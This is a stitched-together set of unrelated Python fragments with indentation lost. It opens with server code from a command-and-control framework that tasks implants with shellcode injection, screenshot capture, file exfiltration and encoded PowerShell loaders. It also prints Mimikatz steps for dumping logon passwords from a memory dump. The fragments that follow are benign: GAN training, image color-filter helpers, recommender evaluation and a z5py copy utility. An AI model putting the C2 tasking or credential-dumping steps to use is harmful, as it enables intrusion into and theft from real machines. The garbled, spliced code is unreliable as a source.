outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
if implant_type.lower().startswith('c#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.lower().startswith('ps'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('py'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('jxa'):
command = f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
if PBind:
command = f"pbind-command {command}"
if FComm:
command = f"fcomm-command {command}"
filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError('Task ID is greater than 5 characters which is not supported.')
print(Colours.YELLOW)
if user is not None and user != "":
print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
print(user_command[0:200])
print("----TRUNCATED----")
else:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if task[2].startswith("loadmodule "):
try:
module_name = (task[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
command=""
elif task[2].startswith("run-exe Program PS "):
try:
cmd = (task[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-pivot-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
doublebase64string = base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % doublebase64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command run-exe Program PS "):
try:
cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pslo "):
try:
module_name = (task[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pslo"):
try:
module_name = (task[2]).replace("pbind-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-loadmodule "):
try:
module_name = (task[2]).replace("pbind-pivot-loadmodule ", "")
if ".exe" in module_name or ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
base64string = base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")
command = f"run-exe PBind PBind {base64string}"
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-pslo"):
try:
module_name = (task[2]).replace("fcomm-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-loadmodule "):
try:
module_name = (task[2]).replace("pbind-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command "):
try:
cmd = command.replace("pbind-command ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-connect"):
command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
elif task[2].startswith("pbind-kill"):
command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
elif task[2].startswith("fcomm-loadmodule "):
try:
module_name = (task[2]).replace("fcomm-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command "):
command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
elif task[2].startswith("fcomm-connect"):
command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
elif task[2].startswith("fcomm-kill"):
command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
elif task[2].startswith("pbind-pivot-command "):
try:
cmd = command.replace("pbind-pivot-command ", "")
base64string1 = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
base64string = base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-connect"):
command = command.replace("pbind-pivot-connect ", "run-exe PBind PBind run-exe PBind PBind start ")
elif task[2].startswith("pbind-pivot-kill"):
command = command.replace("pbind-pivot-kill", "run-exe PBind PBind run-exe PBind PBind kill-implant")
# Uncomment to print actual commands that are being sent
# if "AAAAAAAAAAAAAAAAAAAA" not in command:
# print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(task[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return responseVal
elif RandomURI in path and not tasks:
        # if there are no tasks but it's a normal beacon, send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return default_response()
|
17044
|
import argparse
import copy
import torch
from torchvision.datasets import MNIST, CIFAR10
import torchvision.transforms as TF
import torchelie as tch
import torchelie.loss.gan.hinge as gan_loss
from torchelie.recipes.gan import GANRecipe
import torchelie.callbacks as tcb
from torchelie.recipes import Recipe
parser = argparse.ArgumentParser()
parser.add_argument('--cpu', action='store_true')
opts = parser.parse_args()
device = 'cpu' if opts.cpu else 'cuda'
BS = 32
tfms = TF.Compose([
TF.Resize(64),
tch.transforms.AdaptPad((64, 64)),
TF.RandomHorizontalFlip(),
TF.ToTensor()])
ds = CIFAR10('~/.cache/torch/cifar10', download=True, transform=tfms)
dl = torch.utils.data.DataLoader(ds,
num_workers=4,
batch_size=BS,
shuffle=True)
def train_net(Gen, Discr):
G = Gen(in_noise=128, out_ch=3)
G_polyak = copy.deepcopy(G).eval()
D = Discr()
print(G)
print(D)
def G_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
preds = D(fake * 2 - 1).squeeze()
loss = gan_loss.generated(preds)
loss.backward()
return {'loss': loss.item(), 'imgs': fake.detach()}
def G_polyak_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G_polyak(z)
return {'imgs': fake.detach()}
def D_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
fake_loss = gan_loss.fake(D(fake * 2 - 1))
fake_loss.backward()
x = batch[0]
real_loss = gan_loss.real(D(x * 2 - 1))
real_loss.backward()
loss = real_loss.item() + fake_loss.item()
        return {'loss': loss, 'real_loss': real_loss.item(), 'fake_loss': fake_loss.item()}
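    # D_fun above is a standard hinge-GAN discriminator step: separate hinge penalties on the
    # fake and real logits, with inputs rescaled from [0, 1] to [-1, 1] before D sees them.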
loop = GANRecipe(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100).to(device)
loop.register('polyak', G_polyak)
loop.G_loop.callbacks.add_callbacks([
tcb.Optimizer(tch.optim.RAdamW(G.parameters(), lr=1e-4, betas=(0., 0.99))),
tcb.Polyak(G, G_polyak),
])
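    # tcb.Polyak keeps G_polyak as a running (Polyak / exponential moving) average of G's
    # weights; the test loop uses G_polyak_fun above, which samples from this averaged copy.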
loop.register('G_polyak', G_polyak)
loop.callbacks.add_callbacks([
tcb.Log('batch.0', 'x'),
tcb.WindowedMetricAvg('real_loss'),
tcb.WindowedMetricAvg('fake_loss'),
tcb.Optimizer(tch.optim.RAdamW(D.parameters(), lr=4e-4, betas=(0., 0.99))),
])
loop.test_loop.callbacks.add_callbacks([
tcb.Log('imgs', 'polyak_imgs'),
tcb.VisdomLogger('main', prefix='test')
])
loop.to(device).run(100)
train_net(tch.models.autogan_64, tch.models.snres_discr_4l)
|
17168
|
import torch
import torch.nn as nn
import csv
# image quantization: round each pixel to the nearest of the 256 8-bit levels
def quantization(x):
x_quan=torch.round(x*255)/255
return x_quan
# piecewise-linear color filter
def CF(img, param, pieces):
param=param[:,:,None,None]
color_curve_sum = torch.sum(param, 4) + 1e-30
total_image = img * 0
for i in range(pieces):
total_image += torch.clamp(img - 1.0 * i /pieces, 0, 1.0 / pieces) * param[:, :, :, :, i]
total_image *= pieces/ color_curve_sum
return total_image
#parsing the data annotation
def load_ground_truth(csv_filename):
image_id_list = []
label_ori_list = []
label_tar_list = []
with open(csv_filename) as csvfile:
reader = csv.DictReader(csvfile, delimiter=',')
for row in reader:
image_id_list.append( row['ImageId'] )
label_ori_list.append( int(row['TrueLabel']) )
label_tar_list.append( int(row['TargetClass']) )
return image_id_list,label_ori_list,label_tar_list
# simple Module to normalize an image
class Normalize(nn.Module):
def __init__(self, mean, std):
super(Normalize, self).__init__()
self.mean = torch.Tensor(mean)
self.std = torch.Tensor(std)
def forward(self, x):
return (x - self.mean.type_as(x)[None,:,None,None]) / self.std.type_as(x)[None,:,None,None]
# values are standard normalization for ImageNet images,
# from https://github.com/pytorch/examples/blob/master/imagenet/main.py
norm = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
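# Minimal usage sketch for CF (an illustration, not part of the original file). It assumes
# `param` has shape [batch, channels, pieces], so that param[:, :, None, None] broadcasts to
# [batch, channels, 1, 1, pieces] inside CF; with equal weights the filter is the identity.
if __name__ == "__main__":
    img = torch.rand(2, 3, 8, 8)          # small random batch of RGB images in [0, 1]
    pieces = 4
    param = torch.ones(2, 3, pieces)      # equal weight for every linear piece
    out = CF(img, param, pieces)
    print(out.shape)                      # torch.Size([2, 3, 8, 8])
    print(torch.allclose(out, img))       # True: equal weights reproduce the input
    print(quantization(img).unique().numel() <= 256)  # quantization snaps to 8-bit levels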
|
17183
|
import os
import time
import argparse
import pandas as pd
from smf import SessionMF
parser = argparse.ArgumentParser()
parser.add_argument('--K', type=int, default=20, help="K items to be used in Recall@K and MRR@K")
parser.add_argument('--factors', type=int, default=100, help="Number of latent factors.")
parser.add_argument('--batch', type=int, default=32, help="Batch size for the training process")
parser.add_argument('--momentum', type=float, default=0.0, help="Momentum of the optimizer adagrad_sub")
parser.add_argument('--regularization', type=float, default=0.0001, help="Regularization Amount of the objective function")
parser.add_argument('--dropout', type=float, default=0.0, help="Share of items that are randomly discarded from the current session while training")
parser.add_argument('--skip', type=float, default=0.0, help="Probability that an item is skipped and the next one is used as the positive example")
parser.add_argument('--neg_samples', type=int, default=2048, help="Number of items that are sampled as negative examples")
parser.add_argument('--activation', type=str, default='linear', help="Final activation function (linear, sigmoid, uf_sigmoid, hard_sigmoid, relu, softmax, softsign, softplus, tanh)")
parser.add_argument('--objective', type=str, default='bpr_max', help="Loss Function (bpr_max, top1_max, bpr, top1)")
parser.add_argument('--epochs', type=int, default=10, help="Number of Epochs")
parser.add_argument('--lr', type=float, default=0.001, help="Learning Rate")
parser.add_argument('--itemid', default='ItemID', type=str)
parser.add_argument('--sessionid', default='SessionID', type=str)
parser.add_argument('--valid_data', default='recSys15Valid.txt', type=str)
parser.add_argument('--train_data', default='recSys15TrainOnly.txt', type=str)
parser.add_argument('--data_folder', default='/home/icvuser/Desktop/Recsys cleaned data/RecSys15 Dataset Splits', type=str)
# Get the arguments
args = parser.parse_args()
train_data = os.path.join(args.data_folder, args.train_data)
x_train = pd.read_csv(train_data)
x_train.sort_values(args.sessionid, inplace=True)
x_train = x_train.iloc[-int(len(x_train) / 64) :]  # keep only the last 1/64 of the training instances
valid_data = os.path.join(args.data_folder, args.valid_data)
x_valid = pd.read_csv(valid_data)
x_valid.sort_values(args.sessionid, inplace=True)
print('Finished Reading Data \nStart Model Fitting...')
# Fitting Model
t1 = time.time()
model = SessionMF(factors = args.factors, session_key = args.sessionid, item_key = args.itemid,
batch = args.batch, momentum = args.momentum, regularization = args.regularization,
dropout = args.dropout, skip = args.skip, samples = args.neg_samples,
activation = args.activation, objective = args.objective, epochs = args.epochs, learning_rate = args.lr)
model.fit(x_train)
t2 = time.time()
print('End Model Fitting with total time =', t2 - t1, '\n Start Predictions...')
# Test Set Evaluation
test_size = 0.0
hit = 0.0
MRR = 0.0
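# Recall@K counts a hit whenever the true next item appears in the top-K predictions;
# MRR@K adds 1/rank of the true item for each such hit. Both are averaged over test_size below.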
cur_length = 0
cur_session = -1
last_items = []
t1 = time.time()
index_item = x_valid.columns.get_loc(args.itemid)
index_session = x_valid.columns.get_loc(args.sessionid)
train_items = model.unique_items
counter = 0
for row in x_valid.itertuples( index=False ):
counter += 1
if counter % 10000 == 0:
print('Finished Prediction for ', counter, 'items.')
session_id, item_id = row[index_session], row[index_item]
if session_id != cur_session:
cur_session = session_id
last_items = []
cur_length = 0
if item_id in model.item_map.keys():
if len(last_items) > cur_length: #make prediction
cur_length += 1
test_size += 1
# Predict the most similar items to items
predictions = model.predict_next(last_items, K = args.K)
# Evaluation
rank = 0
for predicted_item in predictions:
#print(predicted_item, item_id, '###')
rank += 1
if int(predicted_item) == item_id:
hit += 1.0
MRR += 1/rank
break
last_items.append(item_id)
t2 = time.time()
print('Recall: {}'.format(hit / test_size))
print ('\nMRR: {}'.format(MRR / test_size))
print('End Model Predictions with total time =', t2 - t1)
|
17196
|
import os
from itertools import product
from concurrent import futures
from contextlib import closing
from datetime import datetime
import numpy as np
from . import _z5py
from .file import File, S3File
from .dataset import Dataset
from .shape_utils import normalize_slices
def product1d(inrange):
for ii in inrange:
yield ii
def blocking(shape, block_shape, roi=None, center_blocks_at_roi=False):
""" Generator for nd blocking.
Args:
shape (tuple): nd shape
block_shape (tuple): nd block shape
roi (tuple[slice]): region of interest (default: None)
center_blocks_at_roi (bool): if given a roi,
whether to center the blocks being generated
at the roi's origin (default: False)
"""
assert len(shape) == len(block_shape), "Invalid number of dimensions."
if roi is None:
# compute the ranges for the full shape
ranges = [range(sha // bsha if sha % bsha == 0 else sha // bsha + 1)
for sha, bsha in zip(shape, block_shape)]
min_coords = [0] * len(shape)
max_coords = shape
else:
# make sure that the roi is valid
roi, _ = normalize_slices(roi, shape)
ranges = [range(rr.start // bsha,
rr.stop // bsha if rr.stop % bsha == 0 else rr.stop // bsha + 1)
for rr, bsha in zip(roi, block_shape)]
min_coords = [rr.start for rr in roi]
max_coords = [rr.stop for rr in roi]
need_shift = False
if roi is not None and center_blocks_at_roi:
shift = [rr.start % bsha for rr, bsha in zip(roi, block_shape)]
need_shift = sum(shift) > 0
# product raises memory error for too large ranges,
# because input iterators are cast to tuple
# so far I have only seen this for 1d "open-ended" datasets
# and hence just implemented a workaround for this case,
# but it should be fairly easy to implement an nd version of product
# without casting to tuple for our use case using the imglib loop trick, see also
# https://stackoverflow.com/questions/8695422/why-do-i-get-a-memoryerror-with-itertools-product
try:
start_points = product(*ranges)
except MemoryError:
assert len(ranges) == 1
start_points = product1d(ranges)
for start_point in start_points:
positions = [sp * bshape for sp, bshape in zip(start_point, block_shape)]
if need_shift:
positions = [pos + sh for pos, sh in zip(positions, shift)]
if any(pos > maxc for pos, maxc in zip(positions, max_coords)):
continue
yield tuple(slice(max(pos, minc), min(pos + bsha, maxc))
for pos, bsha, minc, maxc in zip(positions, block_shape,
min_coords, max_coords))
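# Illustrative example (not executed): blocking((5, 10), (2, 5)) yields
#   (slice(0, 2), slice(0, 5)), (slice(0, 2), slice(5, 10)),
#   (slice(2, 4), slice(0, 5)), (slice(2, 4), slice(5, 10)),
#   (slice(4, 5), slice(0, 5)), (slice(4, 5), slice(5, 10)),
# i.e. edge blocks are clipped to the array shape.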
def copy_dataset_impl(f_in, f_out, in_path_in_file, out_path_in_file,
n_threads, chunks=None, block_shape=None, dtype=None,
roi=None, fit_to_roi=False, **new_compression):
""" Implementation of copy dataset.
Used to implement `copy_dataset`, `convert_to_h5` and `convert_from_h5`.
Can also be used for more flexible use cases, like copying from a zarr/n5
    cloud dataset to a filesystem dataset.
Args:
f_in (File): input file object.
f_out (File): output file object.
in_path_in_file (str): name of input dataset.
out_path_in_file (str): name of output dataset.
n_threads (int): number of threads used for copying.
chunks (tuple): chunks of the output dataset.
By default same as input dataset's chunks. (default: None)
block_shape (tuple): block shape used for copying. Must be a multiple
of ``chunks``, which are used by default (default: None)
dtype (str): datatype of the output dataset, default does not change datatype (default: None).
roi (tuple[slice]): region of interest that will be copied. (default: None)
fit_to_roi (bool): if given a roi, whether to set the shape of
the output dataset to the roi's shape
and align chunks with the roi's origin. (default: False)
**new_compression: compression library and options for output dataset. If not given,
the same compression as in the input is used.
"""
ds_in = f_in[in_path_in_file]
# check if we can copy chunk by chunk
in_is_z5 = isinstance(f_in, (File, S3File))
out_is_z5 = isinstance(f_out, (File, S3File))
copy_chunks = (in_is_z5 and out_is_z5) and (chunks is None or chunks == ds_in.chunks) and (roi is None)
# get dataset metadata from input dataset if defaults were given
chunks = ds_in.chunks if chunks is None else chunks
dtype = ds_in.dtype if dtype is None else dtype
    # Zarr objects may not have a compression attribute; if so, set it to the settings passed to this function
if not hasattr(ds_in, "compression"):
ds_in.compression = new_compression
compression = new_compression.pop("compression", ds_in.compression)
compression_opts = new_compression
same_lib = in_is_z5 == out_is_z5
if same_lib and compression == ds_in.compression:
compression_opts = compression_opts if compression_opts else ds_in.compression_opts
if out_is_z5:
compression = None if compression == 'raw' else compression
compression_opts = {} if compression_opts is None else compression_opts
else:
compression_opts = {'compression_opts': None} if compression_opts is None else compression_opts
    # if no block shape is explicitly given, use the chunk size;
# otherwise check that it's a multiple of chunks
if block_shape is None:
block_shape = chunks
else:
assert all(bs % ch == 0 for bs, ch in zip(block_shape, chunks)),\
"block_shape must be a multiple of chunks"
shape = ds_in.shape
# we need to create the blocking here, before the shape is potentially altered
# if fit_to_roi == True
blocks = blocking(shape, block_shape, roi, fit_to_roi)
if roi is not None:
roi, _ = normalize_slices(roi, shape)
if fit_to_roi:
shape = tuple(rr.stop - rr.start for rr in roi)
ds_out = f_out.require_dataset(out_path_in_file,
dtype=dtype,
shape=shape,
chunks=chunks,
compression=compression,
**compression_opts)
